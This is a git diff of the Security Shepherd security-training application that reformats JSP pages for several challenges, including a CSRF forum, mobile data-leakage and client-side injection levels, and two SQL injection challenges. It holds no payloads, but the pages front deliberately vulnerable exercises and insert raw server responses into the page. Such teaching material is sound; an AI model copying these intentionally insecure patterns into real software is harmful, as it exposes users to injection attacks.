-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv">
+			<%= Getter.getCsrfForumWithIframe(ApplicationRoot, userClass, Getter.getModuleIdFromHash(ApplicationRoot, levelHash), bundle) %>
+		</div>
+		</p>
+	</div>
+	<script>
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theMessage = $("#myMessageAris").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						dataType: "text",
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							myMessage: theMessage,
+							csrfToken: "<%= csrfToken %>"
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7.jsp b/src/main/webapp/challenges/85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7.jsp
index 5031a8d0a..015cddbef 100644
--- a/src/main/webapp/challenges/85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7.jsp
+++ b/src/main/webapp/challenges/85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7.jsp
@@ -1,92 +1,99 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Unintended Data Leakage 2";
+String levelName = "Mobile Unintended Data Leakage 2";
 //Alphanumeric Only
-    String levelHash = "85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7";
+String levelHash = "85ceae7ec397c8f4448be51c33a634194bf5da440282227c15954bbdfb54f0c7";
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.unintendedDataLeakage.dataLeakage", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.unintendedDataLeakage.dataLeakage", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge2.challengeName");
-    String paragraph1 = bundle.getString("challenge2.para1");
+String LevelName = bundle.getString("challenge2.challengeName");
+String paragraph1 = bundle.getString("challenge2.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= levelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= levelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= LevelName %>
-    </h2>
-    <p>
-        <%= paragraph1 %>
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " UDataLeakage3.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= LevelName %></h2>
+		<p>
+			<%= paragraph1 %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " UDataLeakage3.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef.jsp b/src/main/webapp/challenges/8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef.jsp
index 7c246ddf5..cdcfb0530 100644
--- a/src/main/webapp/challenges/8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef.jsp
+++ b/src/main/webapp/challenges/8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef.jsp
@@ -1,93 +1,100 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Sean Duggan
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Sean Duggan
+ */
 //No Quotes In level Name
-    String levelName = "Mobile Client Side Injection 1";
+String levelName = "Mobile Client Side Injection 1";
 //Alphanumeric Only
-    String levelHash = "8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef";
+String levelHash = "8855c8bb9df4446a546414562eda550520e29f7a82400a317c579eb3a5a0a8ef";
 
 
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.clientSideInjection.clientSideInjection", locale);
-    ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.mobile.clientSideInjection.clientSideInjection", locale);
+ResourceBundle mobile = ResourceBundle.getBundle("i18n.moduleGenerics.mobileGenericStrings", locale);
 
 //Used more than once translations
-    String LevelName = bundle.getString("challenge1.challengeName");
-    String paragraph1 = bundle.getString("challenge1.para1");
+String LevelName = bundle.getString("challenge1.challengeName");
+String paragraph1 = bundle.getString("challenge1.para1");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= levelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= levelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= LevelName %>
-    </h2>
-    <p>
-        <%= paragraph1 %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= LevelName %></h2>
+		<p>
+			<%= paragraph1 %>
 
-        <br/> <br/>
-        <%= mobile.getString("mobileBlurb.vmLink.1") + " CSInjection1.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
+			<br /> <br />
+			<%= mobile.getString("mobileBlurb.vmLink.1") + " CSInjection1.apk " + mobile.getString("mobileBlurb.vmLink.2")  %>
 
-    </p>
-</div>
+		</p>
+	</div>
 
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.jsp b/src/main/webapp/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.jsp
index a51189a3b..dd569c68a 100644
--- a/src/main/webapp/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.jsp
+++ b/src/main/webapp/challenges/8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced.jsp
@@ -1,157 +1,164 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * SQL Injection Challenge 7
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * SQL Injection Challenge 7
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "SQL Injection Challenge 7";
-    String levelHash = "8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced";
-
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
-    //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
-
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ String levelName = "SQL Injection Challenge 7";
+ String levelHash = "8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced";
+ 
+ //Translation Stuff
+ Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
+ //Used more than once translations
+ String i18nLevelName = bundle.getString("challenge.challengeName");
+ 
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%= i18nLevelName %>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%= i18nLevelName %></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard.min.js"></script>
-<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
-<script type="text/javascript"
-        src="../js/clipboard-js/clipboard-events.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-            <%= bundle.getString("challenge.description") %>
-    <form id="leForm" action="javascript:;">
-        <table>
-            <tr>
-                <td colspan="2"><%= bundle.getString("challenge.form.pleaseEnterCredentials") %>
-                </td>
-            </tr>
-            <tr>
-                <td><%= bundle.getString("challenge.form.email") %>
-                </td>
-                <td><input style="width: 400px;" id="subEmail" type="text"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td><%= bundle.getString("challenge.form.password") %>
-                </td>
-                <td><input style="width: 400px;" id="subPass" type="password"
-                           autocomplete="off"/></td>
-            </tr>
-            <tr>
-                <td>
-                    <div id="submitButton">
-                        <input type="submit"
-                               value="<%= bundle.getString("challenge.form.button.value") %>"/>
-                    </div>
-                    <p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
-                    </p>
-                </td>
-            </tr>
-        </table>
-    </form>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard.min.js"></script>
+	<script type="text/javascript" src="../js/clipboard-js/tooltips.js"></script>
+	<script type="text/javascript"
+		src="../js/clipboard-js/clipboard-events.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("challenge.description") %>
+		<form id="leForm" action="javascript:;">
+			<table>
+				<tr>
+					<td colspan="2"><%= bundle.getString("challenge.form.pleaseEnterCredentials") %>
+					</td>
+				</tr>
+				<tr>
+					<td><%= bundle.getString("challenge.form.email") %></td>
+					<td><input style="width: 400px;" id="subEmail" type="text"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td><%= bundle.getString("challenge.form.password") %></td>
+					<td><input style="width: 400px;" id="subPass" type="password"
+						autocomplete="off" /></td>
+				</tr>
+				<tr>
+					<td>
+						<div id="submitButton">
+							<input type="submit"
+								value="<%= bundle.getString("challenge.form.button.value") %>" />
+						</div>
+						<p style="display: none;" id="loadingSign"><%= bundle.getString("sign.loading") %>...
+						</p>
+					</td>
+				</tr>
+			</table>
+		</form>
 
-    <div id="resultsDiv"></div>
-    </p>
-</div>
-<script>
-    var counter = 0;
-    $("#leForm").submit(function () {
-        $("#submitButton").hide("fast");
-        $("#loadingSign").show("slow");
-        var theEmail = $("#subEmail").val();
-        var thePass = $("#subPass").val();
-        $("#resultsDiv").hide("slow", function () {
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: "<%= levelHash %>",
-                data: {
-                    subEmail: theEmail,
-                    subPassword: thePass
-                },
-                async: false
-            });
-            if (ajaxCall.status == 200) {
-                $("#resultsDiv").html(ajaxCall.responseText);
-            } else {
-                $("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-            }
-            $("#resultsDiv").show("slow", function () {
-                $("#loadingSign").hide("fast", function () {
-                    $("#submitButton").show("slow");
-                });
-            });
-        });
-    });
-    $("#aUserId").change(function () {
-        $("#userContent").text($(this).val());
-    }).change();
-    $("#theHintButton").click(function () {
-        $("#hintButton").hide("fast", function () {
-            $("#hint").show("fast");
-        });
-    });
-    ;
-</script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+		<div id="resultsDiv"></div>
+		</p>
+	</div>
+	<script>
+			var counter = 0;
+			$("#leForm").submit(function(){
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				var theEmail = $("#subEmail").val();
+				var thePass = $("#subPass").val();
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<%= levelHash %>",
+						data: {
+							subEmail: theEmail,
+							subPassword: thePass
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> <%= bundle.getString("error.occurred") %>: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+			$("#aUserId").change(function () {
+				$("#userContent").text($(this).val());
+			}).change();
+			$("#theHintButton").click(function() {
+				$("#hintButton").hide("fast", function(){
+					$("#hint").show("fast");
+				});
+			});;
+		</script>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>
\ No newline at end of file
diff --git a/src/main/webapp/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.jsp b/src/main/webapp/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.jsp
index f282e9229..6586be24e 100644
--- a/src/main/webapp/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.jsp
+++ b/src/main/webapp/challenges/8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4.jsp
@@ -1,164 +1,172 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * SQL Injection Escaping Challenge
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
+/**
+ * SQL Injection Escaping Challenge
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
 
-    String levelName = "SQL Injection Escaping Challenge";
-    String levelHash = "8c3c35c30cdbbb73b7be3a4f8587aa9d88044dc43e248984a252c6e861f673d4";
-    //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("i18n.challenges.injection." + levelHash, locale);
-    //Used more than once translations
-    String i18nLevelName = bundle.getString("challenge.challengeName");
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
